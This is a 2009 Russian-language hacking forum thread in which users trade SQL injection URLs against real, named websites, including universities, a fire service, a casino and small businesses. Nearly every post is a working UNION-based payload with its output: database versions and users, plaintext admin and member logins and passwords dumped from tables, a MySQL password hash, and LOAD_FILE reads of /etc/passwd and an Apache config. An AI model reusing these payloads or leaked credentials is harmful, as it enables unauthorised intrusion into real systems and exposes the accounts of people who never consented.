Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.02.2009, 10:34
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.ic-computers.ro/content/html/index.php?a=show_prod&pid=256+AND+ASCII(SUBSTRING( (select+version()),1,1))=37--
Version : 5.0.67-community
Database : iccomput_iccomputers
User : iccomput_iccomputers@localhost
|
|
|
21.02.2009, 12:57
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
athabascau.ca - PR7
Код:
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
DB_Ver:5.0.45
DB_User:wiu_webuser@localhost
DB:db_wiu
В принципе есть таблица news_login с полями id,username,password вот пример запроса:
Код:
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+FROM+news_login/*
И собственно вот ид,логин и пароль
0:admin:ccsadmin108
но где это использовать неизвестно =)
|
|
|
|
21.02.2009, 13:25
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Код:
http://www.wedasoft.at/en/promos.php?id=-9+union+select+1,2,3,4,5,6,7,8
.....
Последний раз редактировалось jokester; 21.02.2009 в 17:42..
Причина: Обычная эо скуля, читай маны
|
|
|
|
21.02.2009, 14:33
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
omnibc.ca - PR5
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/*
DB_Ver: 5.0.45
DB_User: omnibc@localhost
DB: omnibc_08_2008
админка:
Код:
http://www.omnibc.ca/admin/
Теперь выясним пароль и логин доступа к админке... Впрочем это не трудно... Таблица с админами называется user а поля id,username,password,role... нам интересны второе и третье, то есть username и password
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,username,password),2,3,4,5,6+FROM+user+LIMIT+0,1/*
Всего 4 пользователя с просто потрясными паролями =) сначала думал что шутка =)
james:jamespass
user:userpass
news:newspass
community:communitypass
|
|
|
|
21.02.2009, 16:35
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
http://www.fire.nsw.gov.au/news.php?news=837+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12+limit+1,1/*
DB_Ver: 4.0.24-nt-max-log
DB_User: vs161854_1@wic036p.server-web.com
DB: vs161854_1
|
|
|
|
21.02.2009, 19:27
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
judoontario.ca - PR5
Код:
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4/*
DB_Ver:4.1.20
DB_User:judo1@localhost
DB:judo
Теперь выясним имена пользователей и их пароли =) Таблица называется members! Поля username,password
Код:
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,concat_ws(0x3a,username,password),4+from+members/*
выводятся все =)
|
|
|
|
21.02.2009, 20:13
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
2ПаВлУшКа
Там идет басик авторизация(может кто уже воткнул).
PR-6 www.irma-grenoble.com
PHP код:
http://www.irma-grenoble.com/04risques_isere/00commune_photos.php?NumeroINSEE=-1)+union+select+1,concat_ws(0x3A,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
irma38@localhost:4.1.19:irma38_communes
PR-4 www.solverde.pt
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,concat_ws(0x3A,user,password,host,file_priv),6+from+mysql.user+limit+5,1--
phpuser:341d6ca146c27aa7:localhost:Y
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6--
Конфиг апача
PHP код:
http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),6--
Последний раз редактировалось AkyHa_MaTaTa; 21.02.2009 в 20:54..
|
|
|
|
21.02.2009, 20:42
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
http://psy-trening.com/reply.php?id=-1+union+select+1,2,3,4,5,6--
Может будет интересно.
|
|
|
|
21.02.2009, 21:20
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Juilliard.edu
http://bookstore.juilliard.edu/shopping/display_image.php?id=-98612+union+select+1,load_file(0x2f7661722f7777772 f626f6f6b73746f72652f61646d696e2f696e6465782e70687 0),3/*
Missouri.edu
http://majors.missouri.edu/viewmajor.php?mid=-179+union+select+1,2,3,4,versioN(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31--
Neu.edu
http://www.policyschool.neu.edu/news/index.php?nid=-18+union+select+1,versioN(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*
Wccs.edu
http://www.wccs.edu/news/article.php?nid=-209+union+select+1,2/*
Последний раз редактировалось sabe; 21.02.2009 в 21:42..
|
|
|
|
21.02.2009, 21:56
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
coalition-sgsl.ca - PR4
Код:
http://www.coalition-sgsl.ca/news.php?news=16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13/*
DB_Ver: 5.0.45-community-nt-log
DB_User: webcura_sgsl@www.connetik.com
DB: webcura_sgsl
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
